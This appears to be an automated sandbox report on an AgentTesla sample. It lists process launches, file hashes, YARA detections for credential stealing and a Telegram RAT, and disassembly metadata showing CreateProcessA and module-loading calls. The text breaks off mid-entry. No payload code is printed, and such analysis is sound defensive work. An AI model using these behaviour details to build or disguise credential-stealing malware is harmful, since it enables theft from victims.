                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x420000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x360000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x5c0000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:12.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:9.3%
                                              Total number of Nodes:108
                                              Total number of Limit Nodes:10
                                              execution_graph 29308 e94668 29309 e94672 29308->29309 29311 e94759 29308->29311 29312 e9477d 29311->29312 29316 e94868 29312->29316 29320 e94858 29312->29320 29318 e9488f 29316->29318 29317 e9496c 29317->29317 29318->29317 29324 e944b4 29318->29324 29322 e94868 29320->29322 29321 e9496c 29321->29321 29322->29321 29323 e944b4 CreateActCtxA 29322->29323 29323->29321 29325 e958f8 CreateActCtxA 29324->29325 29327 e959bb 29325->29327 29327->29327 29367 48c022d 29368 48c00d4 29367->29368 29369 48c00e3 29368->29369 29372 48c3008 29368->29372 29378 48c2ff9 29368->29378 29373 48c301d 29372->29373 29385 48c303a 29373->29385 29391 48c3048 29373->29391 29397 48c30a6 29373->29397 29374 48c302f 29374->29369 29379 48c2fb3 29378->29379 29380 48c3007 29378->29380 29379->29369 29382 48c3048 CreateProcessA 29380->29382 29383 48c303a CreateProcessA 29380->29383 29384 48c30a6 CreateProcessA 29380->29384 29381 48c302f 29381->29369 29382->29381 29383->29381 29384->29381 29386 48c3048 29385->29386 29389 48c3086 29386->29389 29404 48c3446 29386->29404 29409 48c3350 29386->29409 29414 48c3360 29386->29414 29389->29374 29392 48c3062 29391->29392 29393 48c3086 29392->29393 29394 48c3446 CreateProcessA 29392->29394 29395 48c3360 CreateProcessA 29392->29395 29396 48c3350 CreateProcessA 29392->29396 29393->29374 29394->29393 29395->29393 29396->29393 29398 48c3034 29397->29398 29400 48c30a9 29397->29400 29399 48c3086 29398->29399 29401 48c3446 CreateProcessA 29398->29401 29402 48c3360 CreateProcessA 29398->29402 29403 48c3350 CreateProcessA 29398->29403 29399->29374 29400->29374 29401->29399 29402->29399 29403->29399 29406 48c3414 29404->29406 29405 48c3431 29405->29389 29406->29405 29419 6bffc48 29406->29419 29411 48c3360 29409->29411 29410 48c3431 29410->29389 29411->29410 29413 6bffc48 CreateProcessA 29411->29413 29412 48c34d1 29412->29389 29413->29412 29416 48c3393 29414->29416 29415 48c3431 29415->29389 29416->29415 29418 6bffc48 CreateProcessA 29416->29418 29417 48c34d1 29417->29389 29418->29417 29420 6bffcd1 CreateProcessA 29419->29420 29422 6bffe93 29420->29422 29423 e9d5c8 DuplicateHandle 29424 e9d65e 29423->29424 29328 48c4218 29329 48c423e 29328->29329 29330 48c43a3 29328->29330 29329->29330 29332 48c26f0 29329->29332 29333 48c4498 PostMessageW 29332->29333 29334 48c4504 29333->29334 29334->29329 29441 48c0174 29443 48c00d4 29441->29443 29442 48c022a 29444 48c00e3 29443->29444 29445 48c3008 CreateProcessA 29443->29445 29446 48c2ff9 CreateProcessA 29443->29446 29445->29442 29446->29442 29335 e9aff0 29336 e9afff 29335->29336 29339 e9b0e8 29335->29339 29347 e9b0d8 29335->29347 29340 e9b0f9 29339->29340 29341 e9b11c 29339->29341 29340->29341 29355 e9b380 29340->29355 29359 e9b370 29340->29359 29341->29336 29342 e9b114 29342->29341 29343 e9b320 GetModuleHandleW 29342->29343 29344 e9b34d 29343->29344 29344->29336 29348 e9b0f9 29347->29348 29349 e9b11c 29347->29349 29348->29349 29353 e9b380 LoadLibraryExW 29348->29353 29354 e9b370 LoadLibraryExW 29348->29354 29349->29336 29350 e9b114 29350->29349 29351 e9b320 GetModuleHandleW 29350->29351 29352 e9b34d 29351->29352 29352->29336 29353->29350 29354->29350 29356 e9b394 29355->29356 29358 e9b3b9 29356->29358 29363 e9ad9c 29356->29363 29358->29342 29361 e9b380 29359->29361 29360 e9b3b9 29360->29342 29361->29360 29362 e9ad9c LoadLibraryExW 29361->29362 29362->29360 29364 e9b560 LoadLibraryExW 29363->29364 29366 e9b5d9 29364->29366 29366->29358 29431 e9d380 29432 e9d3c6 GetCurrentProcess 29431->29432 29434 e9d418 GetCurrentThread 29432->29434 29437 e9d411 29432->29437 29435 e9d44e 29434->29435 29436 e9d455 GetCurrentProcess 29434->29436 29435->29436 29440 e9d48b 29436->29440 29437->29434 29438 e9d4b3 GetCurrentThreadId 29439 e9d4e4 29438->29439 29440->29438

                                              Executed Functions

                                              Function 06BF5230 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 343 6bf5230-6bf5258 344 6bf525f-6bf5354 343->344 345 6bf525a 343->345 350 6bf597b-6bf5987 344->350 345->344 351 6bf598d-6bf5994 350->351 352 6bf5359-6bf5365 350->352 353 6bf536c-6bf53b8 352->353 354 6bf5367 352->354 357 6bf5428-6bf542c 353->357 354->353 358 6bf542e-6bf5460 357->358 359 6bf53ba-6bf53d8 357->359 368 6bf548a 358->368 369 6bf5462-6bf546e 358->369 362 6bf53ea-6bf53f0 359->362 363 6bf53da-6bf53e8 359->363 365 6bf541f-6bf5423 362->365 363->358 366 6bf5425 365->366 367 6bf53f2-6bf53fe 365->367 366->357 372 6bf5405-6bf540d 367->372 373 6bf5400 367->373 374 6bf5490-6bf54bd 368->374 370 6bf5478-6bf547e 369->370 371 6bf5470-6bf5476 369->371 376 6bf5488 370->376 371->376 377 6bf540f-6bf541a 372->377 378 6bf541c 372->378 373->372 380 6bf54bf-6bf54f7 374->380 381 6bf550c-6bf55a2 374->381 376->374 377->366 378->365 386 6bf5952-6bf5978 380->386 392 6bf55f3-6bf55f9 381->392 386->350 393 6bf55fb-6bf56bd 392->393 394 6bf55a4-6bf55c3 392->394 405 6bf56bf-6bf56f8 393->405 406 6bf56fe-6bf5702 393->406 395 6bf55ca-6bf55f0 394->395 396 6bf55c5 394->396 395->392 396->395 405->406 407 6bf5704-6bf573d 406->407 408 6bf5743-6bf5747 406->408 407->408 409 6bf5749-6bf5782 408->409 410 6bf5788-6bf578c 408->410 409->410 413 6bf578e-6bf5796 410->413 414 6bf57e5-6bf5840 410->414 416 6bf57dd-6bf57e3 413->416 421 6bf5877-6bf58a1 414->421 422 6bf5842-6bf5875 414->422 416->414 418 6bf5798-6bf57da 416->418 418->416 426 6bf58aa-6bf5929 421->426 422->426 430 6bf5930-6bf5943 426->430 430->386
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$:$pgq$~
                                              • API String ID: 0-1276774758
                                              • Opcode ID: cf3cc3d74ec29ecde6e8dc6a521aaa760d5b0a9a47f2c8d4b70fc5280ba93917
                                              • Instruction ID: 663127472a35ea713c85555d74e478ac3cf8e6ae762263a2952943d24e2a7d6d
                                              • Opcode Fuzzy Hash: cf3cc3d74ec29ecde6e8dc6a521aaa760d5b0a9a47f2c8d4b70fc5280ba93917
                                              • Instruction Fuzzy Hash: 2032E275A00218DFDB65CFA8C944F99BBB2FF88300F1580E9E609AB276C7319995DF50
                                              Function 06BF2106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 536 6bf2106-6bf210a 537 6bf2acd-6bf2ae3 536->537 538 6bf210b-6bf2120 536->538 538->537 539 6bf2121-6bf212c 538->539 541 6bf2132-6bf213e 539->541 542 6bf214a-6bf2159 541->542 544 6bf21b8-6bf21bc 542->544 545 6bf2264-6bf22ce 544->545 546 6bf21c2-6bf21cb 544->546 545->537 584 6bf22d4-6bf281b 545->584 547 6bf20c6-6bf20d2 546->547 548 6bf21d1-6bf21e7 546->548 547->537 550 6bf20d8-6bf20e4 547->550 554 6bf2239-6bf224b 548->554 555 6bf21e9-6bf21ec 548->555 552 6bf215b-6bf2161 550->552 553 6bf20e6-6bf20fa 550->553 552->537 556 6bf2167-6bf217f 552->556 553->552 563 6bf20fc-6bf2105 553->563 564 6bf2a0c-6bf2ac2 554->564 565 6bf2251-6bf2261 554->565 555->537 558 6bf21f2-6bf222f 555->558 556->537 567 6bf2185-6bf21ad 556->567 558->545 580 6bf2231-6bf2237 558->580 563->536 564->537 567->544 580->554 580->555 662 6bf281d-6bf2827 584->662 663 6bf2832-6bf28c5 584->663 664 6bf282d 662->664 665 6bf28d0-6bf2963 662->665 663->665 666 6bf296e-6bf2a01 664->666 665->666 666->564
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D
                                              • API String ID: 0-2746444292
                                              • Opcode ID: 4de358bbcffda8e19b11253a90a9346535ff292b81e6af05710efb2e37794b60
                                              • Instruction ID: d9acf3f769b51ab7180f4d322599f4cf7cf65ac3cb9fcc5b12d976fae766f57a
                                              • Opcode Fuzzy Hash: 4de358bbcffda8e19b11253a90a9346535ff292b81e6af05710efb2e37794b60
                                              • Instruction Fuzzy Hash: 6052C874A112298FCB64DF64C899A9DBBB6FF89300F1041D9D509AB3A5CF34AE81CF51
                                              Function 06BF7449 Relevance: .3, Instructions: 270COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 513f7a4b1b124edb427e082761e920d6f1252671547beb94ef9d4efb4b2ffa21
                                              • Instruction ID: fb1b5853bc4b9c140b5bb2a24edfa1adbaccf6df123b6c8642cd60f4f6951a6e
                                              • Opcode Fuzzy Hash: 513f7a4b1b124edb427e082761e920d6f1252671547beb94ef9d4efb4b2ffa21
                                              • Instruction Fuzzy Hash: CAB1D7B0D1422CCFEBA4DFA5D844BDEBBB2BF49314F1090A9D519A7261DB740A89CF41
                                              Function 06BF7458 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f2c19613451fcc8868dac06762aa51db8d0d675677026353a49a2d41ba7ba4b
                                              • Instruction ID: 0415cb3616d4173fb3ce2d546b7174a6aa5adabcf376b2ea45e1e7ee6c46ec5c
                                              • Opcode Fuzzy Hash: 5f2c19613451fcc8868dac06762aa51db8d0d675677026353a49a2d41ba7ba4b
                                              • Instruction Fuzzy Hash: FFB1D7B0D1422CCFEBA4DFA5D844BDEBBB2BB49314F1090A9D519A7261DB740A89CF41
                                              Function 048C3360 Relevance: .2, Instructions: 175COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c9c8f2945625e64a553eb44e072a1ba484e1d528e3e2145d0543ed8f9fa8e0c
                                              • Instruction ID: 241dacd5a129563e14bb2b42eb1bf365c0e6a9ec93185986db46e599ac82eafd
                                              • Opcode Fuzzy Hash: 1c9c8f2945625e64a553eb44e072a1ba484e1d528e3e2145d0543ed8f9fa8e0c
                                              • Instruction Fuzzy Hash: E1712971E046198BDB65CF66CC407E9F7B6BF99300F14D6AAD80DA6250EB709AC6CF40
                                              Function 048C08C0 Relevance: .1, Instructions: 146COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d05ef51defe837ecc9b42286e18698e4f45cfc01c2c78551a6d5c0ddbb18aaf6
                                              • Instruction ID: 2a44fecab3d911a54d8f52828b3492878b3b2832b09fbf18f9bc963e08fbb998
                                              • Opcode Fuzzy Hash: d05ef51defe837ecc9b42286e18698e4f45cfc01c2c78551a6d5c0ddbb18aaf6
                                              • Instruction Fuzzy Hash: 5C517A74E09208CBEB04CFE9D4447EDFBF5AB4A354F00A629D119E7255E738A94ADF40
                                              Function 048C38A3 Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c08db525bb26394a343c36f965e3528c35b11b36556cc08dfc23c2218019e584
                                              • Instruction ID: bd3435d2205f08377d5e6c224328178d56b9a79a282508b28086093e26141da2
                                              • Opcode Fuzzy Hash: c08db525bb26394a343c36f965e3528c35b11b36556cc08dfc23c2218019e584
                                              • Instruction Fuzzy Hash: A6D01774E4D108CAC751AAA4A8181F5B2BCA71A30AF047E58880AD7201E230E8029E25
                                              Function 00E9D370 Relevance: 6.1, APIs: 4, Instructions: 144threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 295 e9d370-e9d37c 296 e9d37e-e9d3bc 295->296 297 e9d3c5-e9d3ce 295->297 296->297 299 e9d35b-e9d36f 297->299 300 e9d3cf-e9d40f GetCurrentProcess 297->300 303 e9d418-e9d44c GetCurrentThread 300->303 304 e9d411-e9d417 300->304 305 e9d44e-e9d454 303->305 306 e9d455-e9d489 GetCurrentProcess 303->306 304->303 305->306 308 e9d48b-e9d491 306->308 309 e9d492-e9d4ad call e9d550 306->309 308->309 312 e9d4b3-e9d4e2 GetCurrentThreadId 309->312 313 e9d4eb-e9d54d 312->313 314 e9d4e4-e9d4ea 312->314 314->313
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D3FE
                                              • GetCurrentThread.KERNEL32 ref: 00E9D43B
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D478
                                              • GetCurrentThreadId.KERNEL32 ref: 00E9D4D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: f4efcfd68093a8a3d7404d96db4663bdbffd9cdc64f971a909d811251ec041bf
                                              • Instruction ID: 92debddbfa960ec264dce180079ac1c00c3d2883eab08977ec1055b79943532e
                                              • Opcode Fuzzy Hash: f4efcfd68093a8a3d7404d96db4663bdbffd9cdc64f971a909d811251ec041bf
                                              • Instruction Fuzzy Hash: FD5188B0904309CFDB15DFA9D948B9EBBF1EF88314F20845AE419B7361DB74A844CB66
                                              Function 00E9D380 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 321 e9d380-e9d40f GetCurrentProcess 325 e9d418-e9d44c GetCurrentThread 321->325 326 e9d411-e9d417 321->326 327 e9d44e-e9d454 325->327 328 e9d455-e9d489 GetCurrentProcess 325->328 326->325 327->328 330 e9d48b-e9d491 328->330 331 e9d492-e9d4ad call e9d550 328->331 330->331 334 e9d4b3-e9d4e2 GetCurrentThreadId 331->334 335 e9d4eb-e9d54d 334->335 336 e9d4e4-e9d4ea 334->336 336->335
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D3FE
                                              • GetCurrentThread.KERNEL32 ref: 00E9D43B
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D478
                                              • GetCurrentThreadId.KERNEL32 ref: 00E9D4D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 9289f17601346fd655c8924bcbc2e788f99a6d7f4a58dda7c2913821db602d6a
                                              • Instruction ID: ef932f7aef73b601239ae8f8cd570c66a68ea0fbfae91cd7c7b2086863a948d1
                                              • Opcode Fuzzy Hash: 9289f17601346fd655c8924bcbc2e788f99a6d7f4a58dda7c2913821db602d6a
                                              • Instruction Fuzzy Hash: 175145B09003098FDB14DFA9D948BAEBBF5EF88314F208459E419B7361DB74A944CB61
                                              Function 06BFFC48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 691 6bffc48-6bffcdd 693 6bffcdf-6bffce9 691->693 694 6bffd16-6bffd36 691->694 693->694 695 6bffceb-6bffced 693->695 701 6bffd6f-6bffd9e 694->701 702 6bffd38-6bffd42 694->702 696 6bffcef-6bffcf9 695->696 697 6bffd10-6bffd13 695->697 699 6bffcfd-6bffd0c 696->699 700 6bffcfb 696->700 697->694 699->699 703 6bffd0e 699->703 700->699 708 6bffdd7-6bffe91 CreateProcessA 701->708 709 6bffda0-6bffdaa 701->709 702->701 704 6bffd44-6bffd46 702->704 703->697 706 6bffd69-6bffd6c 704->706 707 6bffd48-6bffd52 704->707 706->701 710 6bffd56-6bffd65 707->710 711 6bffd54 707->711 722 6bffe9a-6bfff20 708->722 723 6bffe93-6bffe99 708->723 709->708 712 6bffdac-6bffdae 709->712 710->710 713 6bffd67 710->713 711->710 714 6bffdd1-6bffdd4 712->714 715 6bffdb0-6bffdba 712->715 713->706 714->708 717 6bffdbe-6bffdcd 715->717 718 6bffdbc 715->718 717->717 719 6bffdcf 717->719 718->717 719->714 733 6bfff22-6bfff26 722->733 734 6bfff30-6bfff34 722->734 723->722 733->734 735 6bfff28 733->735 736 6bfff36-6bfff3a 734->736 737 6bfff44-6bfff48 734->737 735->734 736->737 738 6bfff3c 736->738 739 6bfff4a-6bfff4e 737->739 740 6bfff58-6bfff5c 737->740 738->737 739->740 741 6bfff50 739->741 742 6bfff6e-6bfff75 740->742 743 6bfff5e-6bfff64 740->743 741->740 744 6bfff8c 742->744 745 6bfff77-6bfff86 742->745 743->742 745->744
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BFFE7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 918b0d077f8f69c96447177ac270051f35f9c6cb74261028912883d3ab7de64e
                                              • Instruction ID: f3081a94820c007642e30a08cfeaca421bafb28e984b16b35cbe43ef0e3d03e9
                                              • Opcode Fuzzy Hash: 918b0d077f8f69c96447177ac270051f35f9c6cb74261028912883d3ab7de64e
                                              • Instruction Fuzzy Hash: 5F917EB1D102198FDF60CF68C840BEDBBB6FF49310F1485A9D908A72A4DB749989CF91
                                              Function 00E9B0E8 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 747 e9b0e8-e9b0f7 748 e9b0f9-e9b106 call e99b54 747->748 749 e9b123-e9b127 747->749 754 e9b108 748->754 755 e9b11c 748->755 750 e9b129-e9b133 749->750 751 e9b13b-e9b17c 749->751 750->751 758 e9b189-e9b197 751->758 759 e9b17e-e9b186 751->759 802 e9b10e call e9b380 754->802 803 e9b10e call e9b370 754->803 755->749 761 e9b199-e9b19e 758->761 762 e9b1bb-e9b1bd 758->762 759->758 760 e9b114-e9b116 760->755 763 e9b258-e9b318 760->763 765 e9b1a9 761->765 766 e9b1a0-e9b1a7 call e9ad50 761->766 764 e9b1c0-e9b1c7 762->764 797 e9b31a-e9b31d 763->797 798 e9b320-e9b34b GetModuleHandleW 763->798 769 e9b1c9-e9b1d1 764->769 770 e9b1d4-e9b1db 764->770 768 e9b1ab-e9b1b9 765->768 766->768 768->764 769->770 772 e9b1e8-e9b1f1 call e9ad60 770->772 773 e9b1dd-e9b1e5 770->773 778 e9b1fe-e9b203 772->778 779 e9b1f3-e9b1fb 772->779 773->772 780 e9b221-e9b225 778->780 781 e9b205-e9b20c 778->781 779->778 804 e9b228 call e9b680 780->804 805 e9b228 call e9b650 780->805 781->780 783 e9b20e-e9b21e call e9ad70 call e9ad80 781->783 783->780 786 e9b22b-e9b22e 788 e9b251-e9b257 786->788 789 e9b230-e9b24e 786->789 789->788 797->798 799 e9b34d-e9b353 798->799 800 e9b354-e9b368 798->800 799->800 802->760 803->760 804->786 805->786
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E9B33E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 96abb3c4a17696b9c2c50d438a82aae43ef4f7beb4dce0bf5ac819250238dd1a
                                              • Instruction ID: baa3fccd5d400a6506dff30b2104073efcbe5695e2ff1216793d2a7db32043ab
                                              • Opcode Fuzzy Hash: 96abb3c4a17696b9c2c50d438a82aae43ef4f7beb4dce0bf5ac819250238dd1a
                                              • Instruction Fuzzy Hash: CA7138B0A00B058FDB24DF2AE55575ABBF1FF88304F00992ED48AEBA50D774E945CB91
                                              Function 00E958EC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 806 e958ec-e958f6 807 e958f8-e959b9 CreateActCtxA 806->807 809 e959bb-e959c1 807->809 810 e959c2-e95a1c 807->810 809->810 817 e95a2b-e95a2f 810->817 818 e95a1e-e95a21 810->818 819 e95a31-e95a3d 817->819 820 e95a40 817->820 818->817 819->820 822 e95a41 820->822 822->822
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E959A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 72aab8b67a9719645059bb193a113e1d2df012e30a964b04af20813b63aee9b2
                                              • Instruction ID: 51b16eb060683fb0d0f00204cf0fd8cd29c5daf1d0a0240b77020bcbe66ed73d
                                              • Opcode Fuzzy Hash: 72aab8b67a9719645059bb193a113e1d2df012e30a964b04af20813b63aee9b2
                                              • Instruction Fuzzy Hash: 0C41D2B1C00719CBDF25CFA9C884B9DBBB6BF49304F60856AD408BB251DB756949CF50
                                              Function 00E944B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 823 e944b4-e959b9 CreateActCtxA 826 e959bb-e959c1 823->826 827 e959c2-e95a1c 823->827 826->827 834 e95a2b-e95a2f 827->834 835 e95a1e-e95a21 827->835 836 e95a31-e95a3d 834->836 837 e95a40 834->837 835->834 836->837 839 e95a41 837->839 839->839
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E959A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e6d7918b05fadc501ec86c42245fb5d071bfdcf9f1abb3dec5ca81f38ef9ad8f
                                              • Instruction ID: 1884e7aea671b295f284520906a21223abde7a5f062e8d30b90e1b962f0e4481
                                              • Opcode Fuzzy Hash: e6d7918b05fadc501ec86c42245fb5d071bfdcf9f1abb3dec5ca81f38ef9ad8f
                                              • Instruction Fuzzy Hash: E341D0B1C00719CBDF25CFA9C884A9DBBB5BF48304F60816AD409BB251DBB56949CF90
                                              Function 00E9D5C2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 840 e9d5c2-e9d5c4 841 e9d5c8-e9d65c DuplicateHandle 840->841 842 e9d65e-e9d664 841->842 843 e9d665-e9d682 841->843 842->843
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D64F
                                              Memory Dump Source
